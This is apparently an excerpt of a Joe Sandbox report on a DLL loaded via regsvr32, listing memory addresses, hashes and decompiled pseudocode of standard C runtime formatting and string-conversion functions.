                                                  0x7fef9d34517
                                                  0x7fef9d3452c
                                                  0x7fef9d34531
                                                  0x7fef9d34539
                                                  0x7fef9d34551
                                                  0x7fef9d34558
                                                  0x7fef9d34563
                                                  0x7fef9d34572
                                                  0x7fef9d34576
                                                  0x7fef9d34586
                                                  0x7fef9d3458c
                                                  0x7fef9d3459f
                                                  0x7fef9d345ca
                                                  0x7fef9d345cc
                                                  0x7fef9d345ce
                                                  0x7fef9d345db
                                                  0x7fef9d345e4
                                                  0x7fef9d345f0
                                                  0x7fef9d345fc
                                                  0x7fef9d34608
                                                  0x7fef9d34615
                                                  0x7fef9d34622
                                                  0x7fef9d3462f
                                                  0x7fef9d34654
                                                  0x7fef9d3465b
                                                  0x7fef9d3465d
                                                  0x7fef9d34662
                                                  0x7fef9d34667
                                                  0x7fef9d3466c
                                                  0x7fef9d34671
                                                  0x7fef9d34673
                                                  0x7fef9d34679
                                                  0x7fef9d34681
                                                  0x7fef9d34683
                                                  0x7fef9d34688
                                                  0x7fef9d3468d
                                                  0x7fef9d34693
                                                  0x7fef9d3469b
                                                  0x7fef9d3469f
                                                  0x7fef9d346a1
                                                  0x7fef9d346ae
                                                  0x7fef9d346b5
                                                  0x7fef9d346bd
                                                  0x7fef9d346bf
                                                  0x7fef9d346cb
                                                  0x7fef9d346d4
                                                  0x7fef9d346da
                                                  0x7fef9d346e2
                                                  0x7fef9d346e6
                                                  0x7fef9d346e8
                                                  0x7fef9d346f5
                                                  0x7fef9d346f9
                                                  0x7fef9d346fc
                                                  0x7fef9d34704
                                                  0x7fef9d34706
                                                  0x7fef9d34712
                                                  0x7fef9d3471a
                                                  0x7fef9d34727
                                                  0x7fef9d3472a
                                                  0x7fef9d3472c
                                                  0x7fef9d34732
                                                  0x7fef9d3473a
                                                  0x7fef9d34742
                                                  0x7fef9d3474a
                                                  0x7fef9d34752
                                                  0x7fef9d3475a
                                                  0x7fef9d34762
                                                  0x7fef9d34767
                                                  0x7fef9d3476f
                                                  0x7fef9d3477b
                                                  0x7fef9d34783
                                                  0x7fef9d34787
                                                  0x7fef9d3478f
                                                  0x7fef9d34794
                                                  0x7fef9d3479c
                                                  0x7fef9d347a1
                                                  0x7fef9d347a9
                                                  0x7fef9d347b2
                                                  0x7fef9d347ba
                                                  0x7fef9d347c2
                                                  0x7fef9d347ca
                                                  0x7fef9d347d2
                                                  0x7fef9d347d7
                                                  0x7fef9d347d9
                                                  0x7fef9d347e1
                                                  0x7fef9d347e5
                                                  0x7fef9d347e7
                                                  0x7fef9d347ef
                                                  0x7fef9d347f1
                                                  0x7fef9d347f3
                                                  0x7fef9d347fb
                                                  0x7fef9d34800
                                                  0x7fef9d34807
                                                  0x7fef9d3480b
                                                  0x7fef9d3480f
                                                  0x7fef9d34813
                                                  0x7fef9d3481b
                                                  0x7fef9d34820
                                                  0x7fef9d34828
                                                  0x7fef9d34830
                                                  0x7fef9d34838
                                                  0x7fef9d34840
                                                  0x7fef9d34845
                                                  0x7fef9d34847
                                                  0x7fef9d3484c
                                                  0x7fef9d34851
                                                  0x7fef9d34859
                                                  0x7fef9d3485b
                                                  0x7fef9d34869

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                                  • String ID: bad exception$csm$csm$csm
                                                  • API String ID: 3498492519-820278400
                                                  • Opcode ID: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                  • Instruction ID: b93d13205fcb5bf4744c4f5868d42f2397ba004b3dd065f5f3bbc86f0087c528
                                                  • Opcode Fuzzy Hash: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                  • Instruction Fuzzy Hash: C412D436A0DBC585DAB19B15E8407EEB7A0F7C8791F604126DACD87BA9CB7DD440CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                                  • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 4023976971-2293733425
                                                  • Opcode ID: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                  • Instruction ID: fa666a0989dbdcd631dba14fdf712f3fd1171dc1b338b0fed7bc0ada6eb2a45d
                                                  • Opcode Fuzzy Hash: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                  • Instruction Fuzzy Hash: 8B024A72A0D7C28AE7B09B24E8447BEB7E4F384345F604126D6CC46AA9DB7EE545CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                  • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                                  • API String ID: 530996419-3695252689
                                                  • Opcode ID: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                  • Instruction ID: dd73616ddae2cae72d7b30165dff30affe8ff5e8ed842a8499c58fb9266416ee
                                                  • Opcode Fuzzy Hash: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                  • Instruction Fuzzy Hash: FAD11832A1CBC585E7A09B15E8407AEB7A0F784794F605626E6DE83BE9DF3DD444CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                  • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                                  • API String ID: 2192614184-1854130327
                                                  • Opcode ID: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                  • Instruction ID: 7076a95ac8019ae0c7cbf4bc144243c7f76c7d2257b38824bc8c592ccc79079f
                                                  • Opcode Fuzzy Hash: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                  • Instruction Fuzzy Hash: 33C10932A0D68286E7B09B54E8547BEB7E0F784744F604126E6CD87AE9CB7EE444CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                  • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2192614184-1870338870
                                                  • Opcode ID: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                  • Instruction ID: de6734cae50e00c17b19ae97f10413d83fe6e5a887ca475c0331002d176214a7
                                                  • Opcode Fuzzy Hash: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                  • Instruction Fuzzy Hash: 66D10972A0DA828AE7B09F64E8447AFB6E0F384349F604125D6CD47AE8DB7ED545CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 19%
                                                  			E000007FE7FEF9D3C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                  				signed int _t223;
                                                  				signed char _t228;
                                                  				intOrPtr _t263;
                                                  				signed int _t338;
                                                  				signed int _t339;
                                                  				signed long long _t342;
                                                  				intOrPtr* _t365;
                                                  				signed long long _t390;
                                                  
                                                  				_t338 = __rax;
                                                  				_a80 = _a80 | 0x00000040;
                                                  				_a72 = 0xa;
                                                  				_a72 = 0xa;
                                                  				_a116 = 0x10;
                                                  				asm("bts eax, 0xf");
                                                  				_a708 = 7;
                                                  				_a708 = 0x27;
                                                  				_a72 = 0x10;
                                                  				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                  				_a84 = 0x30;
                                                  				_a85 = _a708 + 0x51;
                                                  				_a92 = 2;
                                                  				_a72 = 8;
                                                  				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                  				asm("bts eax, 0x9");
                                                  				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                  				E000007FE7FEF9D31EA0( &_a1112);
                                                  				_a824 = _t338;
                                                  				goto 0xf9d3c84b;
                                                  				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                  				E000007FE7FEF9D31EA0( &_a1112);
                                                  				_a824 = _t338;
                                                  				goto 0xf9d3c84b;
                                                  				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                  				_t339 = E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t339;
                                                  				goto 0xf9d3c80e;
                                                  				E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t339;
                                                  				goto 0xf9d3c84b;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                  				E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t339;
                                                  				goto 0xf9d3c84b;
                                                  				E000007FE7FEF9D31E40( &_a1112);
                                                  				_a824 = _t339;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                  				if (_a824 >= 0) goto 0xf9d3c882;
                                                  				_a832 =  ~_a824;
                                                  				asm("bts eax, 0x8");
                                                  				goto 0xf9d3c892;
                                                  				_t342 = _a824;
                                                  				_a832 = _t342;
                                                  				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                  				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                  				_a832 = _a832 & _t342;
                                                  				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                  				_a116 = 1;
                                                  				goto 0xf9d3c8f5;
                                                  				_a80 = _a80 & 0xfffffff7;
                                                  				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                  				_a116 = 0x200;
                                                  				if (_a832 != 0) goto 0xf9d3c908;
                                                  				_a92 = 0;
                                                  				_a64 =  &_a687;
                                                  				_t223 = _a116;
                                                  				_a116 = _a116 - 1;
                                                  				if (_t223 > 0) goto 0xf9d3c936;
                                                  				if (_a832 == 0) goto 0xf9d3c9d3;
                                                  				_a1040 = _a72;
                                                  				_a816 = _t223 / _a1040 + 0x30;
                                                  				_a1048 = _a72;
                                                  				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                  				_t228 = _a816 + _a708;
                                                  				_a816 = _t228;
                                                  				 *_a64 = _a816 & 0x000000ff;
                                                  				_a64 = _a64 - 1;
                                                  				goto 0xf9d3c915;
                                                  				_a104 = _t228;
                                                  				_a64 = _a64 + 1;
                                                  				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                  				if (_a104 == 0) goto 0xf9d3ca12;
                                                  				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                  				_a64 = _a64 - 1;
                                                  				 *_a64 = 0x30;
                                                  				_a104 = _a104 + 1;
                                                  				if (_a108 != 0) goto 0xf9d3cc6e;
                                                  				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                  				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                  				_a84 = 0x2d;
                                                  				_a92 = 1;
                                                  				goto 0xf9d3ca95;
                                                  				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                  				_a84 = 0x2b;
                                                  				_a92 = 1;
                                                  				goto 0xf9d3ca95;
                                                  				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                  				_a84 = 0x20;
                                                  				_a92 = 1;
                                                  				_a840 = _a88 - _a104 - _a92;
                                                  				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                  				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                  				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                  				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                  				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                  				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                  				if (_a76 == 0) goto 0xf9d3cc1d;
                                                  				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                  				_a872 = 0;
                                                  				_a848 = _a64;
                                                  				_a856 = _a104;
                                                  				_a856 = _a856 - 1;
                                                  				if (_a856 == 0) goto 0xf9d3cc1b;
                                                  				_a1056 =  *_a848 & 0x0000ffff;
                                                  				r9d = _a1056 & 0x0000ffff;
                                                  				r8d = 6;
                                                  				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                  				_a848 =  &(_a848[1]);
                                                  				if (_a872 != 0) goto 0xf9d3cbe5;
                                                  				if (_a860 != 0) goto 0xf9d3cbf2;
                                                  				_a688 = 0xffffffff;
                                                  				goto 0xf9d3cc1b;
                                                  				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                  				goto 0xf9d3cb60;
                                                  				goto 0xf9d3cc3b;
                                                  				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                  				if (_a688 < 0) goto 0xf9d3cc6e;
                                                  				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                  				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                  				if (_a96 == 0) goto 0xf9d3cc8e;
                                                  				0xf9d25330();
                                                  				_a96 = 0;
                                                  				goto 0xf9d3b99c;
                                                  				if (_a704 == 0) goto 0xf9d3ccb4;
                                                  				if (_a704 == 7) goto 0xf9d3ccb4;
                                                  				_a1060 = 0;
                                                  				goto 0xf9d3ccbf;
                                                  				_a1060 = 1;
                                                  				_t263 = _a1060;
                                                  				_a876 = _t263;
                                                  				if (_a876 != 0) goto 0xf9d3cd05;
                                                  				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                  				_a32 = _t365;
                                                  				r9d = 0;
                                                  				r8d = 0x8f5;
                                                  				0xf9d2b3b0();
                                                  				if (_t263 != 1) goto 0xf9d3cd05;
                                                  				asm("int3");
                                                  				if (_a876 != 0) goto 0xf9d3cd61;
                                                  				0xf9d2ab30();
                                                  				 *_t365 = 0x16;
                                                  				_a32 = 0;
                                                  				r9d = 0x8f5;
                                                  				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                  				_a912 = 0xffffffff;
                                                  				E000007FE7FEF9D26800( &_a120);
                                                  				goto 0xf9d3cd80;
                                                  				_a916 = _a688;
                                                  				E000007FE7FEF9D26800( &_a120);
                                                  				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                  			}











                                                  0x7fef9d3c6d6
                                                  0x7fef9d3c6dd
                                                  0x7fef9d3c6e1
                                                  0x7fef9d3c6ee
                                                  0x7fef9d3c6f8
                                                  0x7fef9d3c704
                                                  0x7fef9d3c70c
                                                  0x7fef9d3c719
                                                  0x7fef9d3c724
                                                  0x7fef9d3c737
                                                  0x7fef9d3c739
                                                  0x7fef9d3c748
                                                  0x7fef9d3c74c
                                                  0x7fef9d3c756
                                                  0x7fef9d3c769
                                                  0x7fef9d3c76f
                                                  0x7fef9d3c782
                                                  0x7fef9d3c78c
                                                  0x7fef9d3c791
                                                  0x7fef9d3c799
                                                  0x7fef9d3c7a9
                                                  0x7fef9d3c7b3
                                                  0x7fef9d3c7b8
                                                  0x7fef9d3c7c0
                                                  0x7fef9d3c7ce
                                                  0x7fef9d3c7d9
                                                  0x7fef9d3c7e8
                                                  0x7fef9d3c7ec
                                                  0x7fef9d3c7f4
                                                  0x7fef9d3c7fe
                                                  0x7fef9d3c806
                                                  0x7fef9d3c80e
                                                  0x7fef9d3c819
                                                  0x7fef9d3c823
                                                  0x7fef9d3c82a
                                                  0x7fef9d3c832
                                                  0x7fef9d3c83c
                                                  0x7fef9d3c843
                                                  0x7fef9d3c854
                                                  0x7fef9d3c85f
                                                  0x7fef9d3c86c
                                                  0x7fef9d3c878
                                                  0x7fef9d3c880
                                                  0x7fef9d3c882
                                                  0x7fef9d3c88a
                                                  0x7fef9d3c89d
                                                  0x7fef9d3c8aa
                                                  0x7fef9d3c8bf
                                                  0x7fef9d3c8cc
                                                  0x7fef9d3c8ce
                                                  0x7fef9d3c8d6
                                                  0x7fef9d3c8df
                                                  0x7fef9d3c8eb
                                                  0x7fef9d3c8ed
                                                  0x7fef9d3c8fe
                                                  0x7fef9d3c900
                                                  0x7fef9d3c910
                                                  0x7fef9d3c915
                                                  0x7fef9d3c91f
                                                  0x7fef9d3c925
                                                  0x7fef9d3c930
                                                  0x7fef9d3c93b
                                                  0x7fef9d3c95e
                                                  0x7fef9d3c96a
                                                  0x7fef9d3c997
                                                  0x7fef9d3c9a9
                                                  0x7fef9d3c9ab
                                                  0x7fef9d3c9bf
                                                  0x7fef9d3c9c9
                                                  0x7fef9d3c9ce
                                                  0x7fef9d3c9e0
                                                  0x7fef9d3c9ec
                                                  0x7fef9d3c9fc
                                                  0x7fef9d3ca03
                                                  0x7fef9d3ca10
                                                  0x7fef9d3ca1a
                                                  0x7fef9d3ca24
                                                  0x7fef9d3ca2d
                                                  0x7fef9d3ca36
                                                  0x7fef9d3ca45
                                                  0x7fef9d3ca52
                                                  0x7fef9d3ca54
                                                  0x7fef9d3ca59
                                                  0x7fef9d3ca61
                                                  0x7fef9d3ca6c
                                                  0x7fef9d3ca6e
                                                  0x7fef9d3ca73
                                                  0x7fef9d3ca7b
                                                  0x7fef9d3ca86
                                                  0x7fef9d3ca88
                                                  0x7fef9d3ca8d
                                                  0x7fef9d3caa5
                                                  0x7fef9d3cab5
                                                  0x7fef9d3cad0
                                                  0x7fef9d3caee
                                                  0x7fef9d3cafc
                                                  0x7fef9d3cb07
                                                  0x7fef9d3cb22
                                                  0x7fef9d3cb2c
                                                  0x7fef9d3cb37
                                                  0x7fef9d3cb3d
                                                  0x7fef9d3cb4d
                                                  0x7fef9d3cb59
                                                  0x7fef9d3cb70
                                                  0x7fef9d3cb79
                                                  0x7fef9d3cb8a
                                                  0x7fef9d3cb92
                                                  0x7fef9d3cb9b
                                                  0x7fef9d3cbb6
                                                  0x7fef9d3cbc9
                                                  0x7fef9d3cbd9
                                                  0x7fef9d3cbe3
                                                  0x7fef9d3cbe5
                                                  0x7fef9d3cbf0
                                                  0x7fef9d3cc11
                                                  0x7fef9d3cc16
                                                  0x7fef9d3cc1b
                                                  0x7fef9d3cc36
                                                  0x7fef9d3cc43
                                                  0x7fef9d3cc4e
                                                  0x7fef9d3cc69
                                                  0x7fef9d3cc74
                                                  0x7fef9d3cc80
                                                  0x7fef9d3cc85
                                                  0x7fef9d3cc8e
                                                  0x7fef9d3cc9b
                                                  0x7fef9d3cca5
                                                  0x7fef9d3cca7
                                                  0x7fef9d3ccb2
                                                  0x7fef9d3ccb4
                                                  0x7fef9d3ccbf
                                                  0x7fef9d3ccc6
                                                  0x7fef9d3ccd5
                                                  0x7fef9d3ccd7
                                                  0x7fef9d3ccde
                                                  0x7fef9d3cce3
                                                  0x7fef9d3cce6
                                                  0x7fef9d3ccf8
                                                  0x7fef9d3cd00
                                                  0x7fef9d3cd02
                                                  0x7fef9d3cd0d
                                                  0x7fef9d3cd0f
                                                  0x7fef9d3cd14
                                                  0x7fef9d3cd1a
                                                  0x7fef9d3cd23
                                                  0x7fef9d3cd3e
                                                  0x7fef9d3cd43
                                                  0x7fef9d3cd53
                                                  0x7fef9d3cd5f
                                                  0x7fef9d3cd68
                                                  0x7fef9d3cd74
                                                  0x7fef9d3cd97

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: get_int64_arg$wctomb_s
                                                  • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                  • API String ID: 2984758162-268265396
                                                  • Opcode ID: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                  • Instruction ID: a9c1e15515d35d7cf033a694107a1be22a212de4b62ef600bdbf999f0f55ea8a
                                                  • Opcode Fuzzy Hash: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                  • Instruction Fuzzy Hash: 7202ED7260DBC586E7B1CB25E8857AEB7E4F384795F200125EACD86AA8DB7DD540CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                  • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                                  • API String ID: 2192614184-660564692
                                                  • Opcode ID: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                  • Instruction ID: 92bf99913cb81df5d7f4b76c0ee557dab353d6c18ff2e6375d0d5446e39197ae
                                                  • Opcode Fuzzy Hash: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                  • Instruction Fuzzy Hash: 8DE10C31A0DBC685E7B09B14E8457AEA3E0F384754FA04626D6DD53AE8DF7ED484CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 57%
                                                  			E000007FE7FEF9D355F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
                                                  				long long _v24;
                                                  				long long _v32;
                                                  				long long _v40;
                                                  				long long _v48;
                                                  				long long _v56;
                                                  				void* _v64;
                                                  				long long _v72;
                                                  				void* _t88;
                                                  				void* _t89;
                                                  				void* _t107;
                                                  				void* _t109;
                                                  				signed int* _t158;
                                                  				signed int* _t160;
                                                  				long long _t175;
                                                  				long long _t186;
                                                  				signed int* _t187;
                                                  				signed int* _t193;
                                                  
                                                  				_a32 = __r9;
                                                  				_a24 = __r8;
                                                  				_a16 = __rdx;
                                                  				_a8 = __rcx;
                                                  				_v72 = 0;
                                                  				_t158 = _a24;
                                                  				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0xf9d35639;
                                                  				_t89 = E000007FE7FEF9D2E680(_t88, _t158);
                                                  				_v56 = _t158 + _a24[1];
                                                  				goto 0xf9d35642;
                                                  				_v56 = 0;
                                                  				if (_v56 == 0) goto 0xf9d356aa;
                                                  				_t160 = _a24;
                                                  				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0xf9d35673;
                                                  				E000007FE7FEF9D2E680(_t89, _t160);
                                                  				_v48 = _t160 + _a24[1];
                                                  				goto 0xf9d3567c;
                                                  				_v48 = 0;
                                                  				if ( *((char*)(_v48 + 0x10)) == 0) goto 0xf9d356aa;
                                                  				if (_a24[2] != 0) goto 0xf9d356b1;
                                                  				if (( *_a24 & 0x80000000) != 0) goto 0xf9d356b1;
